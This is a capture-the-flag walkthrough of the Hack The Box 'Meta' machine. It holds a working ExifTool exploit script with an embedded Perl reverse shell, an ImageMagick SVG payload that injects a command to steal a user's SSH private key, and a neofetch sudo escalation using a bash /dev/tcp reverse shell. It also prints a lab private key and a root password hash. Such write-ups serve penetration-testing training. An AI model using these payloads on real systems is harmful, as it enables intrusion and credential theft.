Hack-The-Box-walkthrough[meta]

Posted on 2022-01-23 Edited on 2022-06-12 In HackTheBox walkthrough Views: Word count in article: 1.4k Reading time ≈ 5 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 22 Jan 2022
IP: 10.10.11.140

Enumeration

NMAP

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.140
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 is our only attack surface so let’s start there. Before the page even loads, we’re redirect to:

1	http://artcorp.htb/

Let’s add that to /etc/hosts and continue:

We don’t have a great deal available to us. We can start bruteforcing directories and subdomains. We eventually find:

1	dev01.artcorp.htb

We seem to have file upload:

1	http://dev01.artcorp.htb/metaview/

We don’t have a great deal of other information. Let’s try capturing requests and seeing where that takes us. We get an interesting response from the metaview upload:

<div class="mt-3" id="output_data">
<pre>File Type                  : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 96
Y Resolution                    : 96
Image Width                     : 1920
Image Height                    : 1440
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
</pre>
</div>

Foothold

The output looks awfully similar to exiftool suggesting potential exploits available to us via the file upload. We don’t have a specific version but we can try using relevant PoCs:

A case study on: CVE-2021-22204 – Exiftool RCE

We’ll start by getting the requirements for the exploit:

CVE-2021-22204-exiftool

This repo has a script that allows us to automatically create payloads to get a reverse shell. We need to start by editting the IP and port variables:

#!/bin/env python3

import base64
import subprocess

ip = '10.10.14.8'
port = '9001'

payload = b"(metadata \"\c${use MIME::Base64;eval(decode_base64('"


payload = payload + base64.b64encode( f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({port},inet_aton('{ip}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};".encode() )

payload = payload + b"'))};\")"


payload_file = open('payload', 'w')
payload_file.write(payload.decode('utf-8'))
payload_file.close()


subprocess.run(['bzz', 'payload', 'payload.bzz'])
subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
subprocess.run(['exiftool', '-config', 'configfile', '-HasselbladExif<=exploit.djvu', 'image.jpg'])

We run the script using:

python3 exploit.py

┌──(root💀kali)-[~/CVE-2021-22204-exiftool]
└─# ls
configfile  exploit.djvu  exploit.py  image.jpg  image.jpg_original  lab  payload  payload.bzz  README.md

and upload the image to the website, we get a reverse shell:

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# nc -lvp 9001                                                                                                              130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.11.140.
Ncat: Connection from 10.10.11.140:54114.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 3: python: not found
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
bash-5.0$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-5.0$ cd /home
cd /home
lsbash-5.0$ 
ls
thomas
bash-5.0$ cd thomas
cd thomas
bash-5.0$ ls
ls
user.txt
bash-5.0$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

User own

We have a user called thomas that we need to try exploit. There is a cron job that runs an image convert script. Most of the binaries used for this are found in /usr/local/bin such as convert. We also have a script containing the following:

1
2
3

#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify

We can do a little research and try finding a relevant exploit:

ImageMagick 7.0.1-0 / 6.9.3-9 - ‘ImageTragick ‘ Multiple Vulnerabilities

We can’t get a reverse shell but we can very easily grab Thomas’ SSH key. We start by creating a file in /tmp:

Putting it in /tmp instead of directly in the /var/ directory so we can re-use it if it fails.
poc.svg

bash-5.0$ echo "PGltYWdlIGF1dGhlbnRpY2F0ZT0nZmYiIGBlY2hvICQoY2F0IH4vLnNzaC9pZF9yc2EpPiAvZGV2L3NobS9pZF9yc2FgOyInPgogIDxyZWFkIGZpbGVuYW1lPSJwZGY6L2V0Yy9wYXNzd2QiLz4KICA8Z2V0IHdpZHRoPSJiYXNlLXdpZHRoIiBoZWlnaHQ9ImJhc2UtaGVpZ2h0IiAvPgogIDxyZXNpemUgZ2VvbWV0cnk9IjQwMHg0MDAiIC8+CiAgPHdyaXRlIGZpbGVuYW1lPSJ0ZXN0LnBuZyIgLz4KICA8c3ZnIHdpZHRoPSI3MDAiIGhlaWdodD0iNzAwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4KICA8aW1hZ2UgeGxpbms6aHJlZj0ibXNsOnBvYy5zdmciIGhlaWdodD0iMTAwIiB3aWR0aD0iMTAwIi8+CiAgPC9zdmc+CjwvaW1hZ2U+" |base64 -d > poc.svg
<wIi8+CiAgPC9zdmc+CjwvaW1hZ2U+" |base64 -d > poc.svg
bash-5.0$ ls
ls
poc.svg  pspy64
bash-5.0$ cat poc.svg
cat poc.svg
<image authenticate='ff" `echo $(cat ~/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

We copy our poc file into:

1	cp poc.svg /var/www/dev01.artcorp.htb/convert_images/poc.svg

We wait for the cron job to run and grab the key then use it to SSH as thomas:

bash-5.0$ pwd
pwd
/dev/shm
bash-5.0$ ls
ls
id_rsa
bash-5.0$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
bhFErAeoncE3vJAAAACXJvb3RAbWV0YQE=
-----END OPENSSH PRIVATE KEY-----

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# chmod 600 id_rsa
                                                                                                                                    
┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# ssh thomas@artcorp.htb -i id_rsa
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan 23 07:54:28 2022 from 10.10.14.8
-bash-5.0$ id
uid=1000(thomas) gid=1000(thomas) groups=1000(thomas)
-bash-5.0$ whoami
thomas
-bash-5.0$ cat user.txt 
997f481194ea9c17c5d4a015cfca3b7c

Root own

We have a /etc/sudoers entry that allows us to run neofetch:

-bash-5.0$ sudo -l
Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"

This is pretty easy to exploit, we search on GTFOBins neofetch exploits and we find this:

gtfobins - neofetch

We have an interesting entry regarding env_keep. We do have a neofetch config in our home dir but this isn’t touched.

-bash-5.0$ pwd
/home/thomas/.config/neofetch
-bash-5.0$ ls
config.conf

We can edit this config to try set the LFILE environment variable but due to how this is setup in the cron entry, we can’t use it. I had a different idea. We can set our own config path to the one in ~/.config using:

1	-bash-5.0$ export XDG_CONFIG_HOME="$HOME/.config"

We change our currrent neofetch config to include a reverse shell:

1 2	-bash-5.0$ echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.8/4444 0>&1'" > /home/thomas/.config/neofetch/config.conf -bash-5.0$ sudo /usr/bin/neofetch \"\"

We run neofetch as per the sudoer entry and catch the shell with netcat:

┌──(root💀kali)-[~/hackthebox/machine/meta]
└─# nc -lvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.140.
Ncat: Connection from 10.10.11.140:51960.
root@meta:/home/thomas/.config/neofetch# id
id
uid=0(root) gid=0(root) groups=0(root)
root@meta:/home/thomas/.config/neofetch# whoami
whoami
root
root@meta:/home/thomas/.config/neofetch# cd
cd
root@meta:~# cat root.txt
cat root.txt
67a535da514ea5d296eed29741c96d96
root@meta:~# cat /etc/shadow | grep root
cat /etc/shadow | grep root
root:$6$C2RdQ0RpQ545cx/2$TMbXaoMwVs7XQVOwEwAnzcUVrIR5CdpVaM3Aoml8p9PWQWvxbrGrh/Y6d2.OuKlSHVsNVS0mJwSoGl.q8Pbug0:18996:0:99999:7:::
root@meta:~#